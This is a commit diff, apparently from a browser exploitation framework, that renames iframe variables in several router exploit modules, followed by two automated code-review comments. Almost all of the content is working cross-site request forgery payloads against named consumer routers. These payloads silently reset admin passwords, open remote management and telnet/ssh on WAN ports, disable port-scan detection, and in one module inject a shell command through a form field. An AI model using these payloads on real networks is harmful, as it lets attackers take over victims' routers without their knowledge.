Add command_id to embedded iframe/img IDs for router exploits
This prevents a race condition where duplicate iframes/imgs are created if a module is run twice simultaneously. The second iframe/img was not being removed during `cleanup()`.
@@ -9,8 +9,9 @@ beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var path = 'utility.cgi';
|
||||
var cmd = '<%= @cmd %>';
|
||||
var timeout = 15;
|
||||
|
||||
var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
|
||||
var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
|
||||
{'type':'hidden', 'name':'testType', 'value':'1'},
|
||||
{'type':'hidden', 'name':'IP', 'value':'||'+cmd}
|
||||
]);
|
||||
@@ -18,9 +19,9 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(com_officeconnect_iframe);
|
||||
document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
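Review bot: `cleanup` is still assigned without `var` and is invoked through the string form `setTimeout("cleanup()", timeout*1000)`, so it remains a single shared global. When two runs overlap, the later run replaces it and both timers appear to call the later closure, which would leave the earlier iframe in the page and make the second `removeChild` throw. The iframe variable was already declared with `var` inside the `beef.execute` callback (which starts outside this hunk), so the `_<%= @command_id %>` suffix on its own does not seem to separate the runs. Keeping the function local and passing it by reference would: `var cleanup = function() { ... };` followed by `setTimeout(cleanup, timeout*1000);`. The same pattern recurs in the cleanup hunks of the other modules in this commit.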
|
||||
|
||||
|
||||
@@ -14,7 +14,7 @@ beef.execute(function() {
|
||||
img.setAttribute("style","visibility:hidden");
|
||||
img.setAttribute("width","0");
|
||||
img.setAttribute("height","0");
|
||||
img.id = 'asmax_ar804gu';
|
||||
img.id = 'asmax_ar804gu_<%= @command_id %>';
|
||||
img.src = gateway+path+cmd;
|
||||
document.body.appendChild(img);
|
||||
|
||||
|
||||
@@ -6,21 +6,21 @@
|
||||
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
|
||||
|
||||
var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
|
||||
[{'type':'hidden', 'name':'0', 'value':'31'} ,
|
||||
{'type':'hidden', 'name':'1', 'value':''},
|
||||
{'type':'hidden', 'name':'30', 'value':passwd}]);
|
||||
var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [
|
||||
{'type':'hidden', 'name':'0', 'value':'31'} ,
|
||||
{'type':'hidden', 'name':'1', 'value':''},
|
||||
{'type':'hidden', 'name':'30', 'value':passwd}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(bt_home_hub_iframe);
|
||||
document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -7,8 +7,9 @@
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
|
||||
var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
|
||||
[
|
||||
{'type':'hidden', 'name':'submit_button', 'value':'Management'},
|
||||
{'type':'hidden', 'name':'change_action', 'value':''},
|
||||
@@ -37,7 +38,7 @@ beef.execute(function() {
|
||||
{'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
|
||||
]);
|
||||
|
||||
var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
|
||||
var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
|
||||
[
|
||||
{'type':'hidden', 'name':'submit_button', 'value':'Firewall'},
|
||||
{'type':'hidden', 'name':'change_action', 'value':''},
|
||||
@@ -59,10 +60,10 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(cisco_e2400_iframe1);
|
||||
document.body.removeChild(cisco_e2400_iframe2);
|
||||
document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>);
|
||||
document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -6,12 +6,13 @@
|
||||
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
|
||||
var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
|
||||
|
||||
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
|
||||
var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
|
||||
var form = document.createElement('form');
|
||||
form.setAttribute('action', gateway + "password.cgi");
|
||||
@@ -37,16 +38,16 @@ beef.execute(function() {
|
||||
input.setAttribute('value', passwd);
|
||||
form.appendChild(input);
|
||||
|
||||
ct5367_iframe2.contentWindow.document.body.appendChild(form);
|
||||
ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form);
|
||||
form.submit();
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(ct5367_iframe1);
|
||||
document.body.removeChild(ct5367_iframe2);
|
||||
document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
|
||||
document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -6,21 +6,22 @@
|
||||
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
|
||||
var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
|
||||
|
||||
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
|
||||
var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(ct5367_iframe1);
|
||||
document.body.removeChild(ct5367_iframe2);
|
||||
document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
|
||||
document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -7,8 +7,9 @@
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
|
||||
var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
|
||||
[{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} ,
|
||||
{'type':'hidden', 'name':'apply', 'value':'Save Settings'},
|
||||
{'type':'hidden', 'name':'admin_name', 'value':'admin'},
|
||||
@@ -23,9 +24,9 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(dir615_iframe);
|
||||
document.body.removeChild(dir615_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -6,9 +6,10 @@
|
||||
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
|
||||
var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
|
||||
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
|
||||
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
|
||||
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},
|
||||
@@ -19,9 +20,9 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(dsl500t_iframe);
|
||||
document.body.removeChild(dsl500t_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -5,19 +5,20 @@
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var gateway = '<%= @base %>';
|
||||
var username = '<%= @username %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
|
||||
huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
|
||||
var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(huawei_smartax_mt880_iframe);
|
||||
document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -5,15 +5,17 @@
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var timeout = 15;
|
||||
|
||||
var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
|
||||
|
||||
var befsr41_iframe = beef.dom.createInvisibleIframe();
|
||||
befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(befsr41_iframe);
|
||||
document.body.removeChild(befsr41_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
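Review bot: On the `setAttribute('src', ...)` line, `<%= @base %>`, `<%= @password %>` and `<%= @port %>` are rendered straight into a single-quoted JavaScript literal that is also a query string, with no escaping for either context. A configured value containing `'`, `&` or `#` would alter the generated script or the request instead of being carried as data. Rendering the values into variables that the template escapes for a JS string, and applying `encodeURIComponent()` to each query value, would keep them as data. The `var passwd = '<%= @password %>';` lines and the `+passwd+` URL concatenations in the other modules of this commit have the same shape.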
|
||||
|
||||
|
||||
@@ -5,11 +5,12 @@
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var port = '<%= @port %>';
|
||||
var port = '<%= @port %>';
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
|
||||
var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
|
||||
[{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
|
||||
{'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
|
||||
{'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
|
||||
@@ -27,9 +28,9 @@ beef.execute(function() {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(wrt54g2_iframe);
|
||||
document.body.removeChild(wrt54g2_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -5,31 +5,33 @@
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var port = '<%= @port %>';
|
||||
var port = '<%= @port %>';
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var timeout = 15;
|
||||
|
||||
var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
|
||||
[{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
|
||||
{'type':'hidden', 'name':'http_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'https_enable', 'value':'0'},
|
||||
{'type':'hidden', 'name':'PasswdModify', 'value':'1'},
|
||||
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
|
||||
var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
|
||||
[
|
||||
{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
|
||||
{'type':'hidden', 'name':'http_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'https_enable', 'value':'0'},
|
||||
{'type':'hidden', 'name':'PasswdModify', 'value':'1'},
|
||||
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
|
||||
{'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
|
||||
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'remote_management', 'value':'1'},
|
||||
{'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
|
||||
{'type':'hidden', 'name':'http_wanport', 'value':port},
|
||||
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'layout', 'value':'en'}
|
||||
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'remote_management', 'value':'1'},
|
||||
{'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
|
||||
{'type':'hidden', 'name':'http_wanport', 'value':port},
|
||||
{'type':'hidden', 'name':'upnp_enable', 'value':'1'},
|
||||
{'type':'hidden', 'name':'layout', 'value':'en'}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(wrt54g_iframe);
|
||||
document.body.removeChild(wrt54g_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -9,30 +9,31 @@ beef.execute(function() {
|
||||
var gateway = '<%= @base %>';
|
||||
var passwd = '<%= @password %>';
|
||||
var port = '<%= @port %>';
|
||||
var timeout = 15;
|
||||
|
||||
var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
|
||||
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
|
||||
var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
|
||||
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
|
||||
{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
|
||||
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
|
||||
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
|
||||
]);
|
||||
|
||||
var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
|
||||
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
|
||||
var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
|
||||
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
|
||||
]);
|
||||
|
||||
var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
|
||||
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
|
||||
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
|
||||
var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
|
||||
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
|
||||
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(virgin_superhub_iframe1);
|
||||
document.body.removeChild(virgin_superhub_iframe2);
|
||||
document.body.removeChild(virgin_superhub_iframe3);
|
||||
document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
|
||||
document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
|
||||
document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
|
||||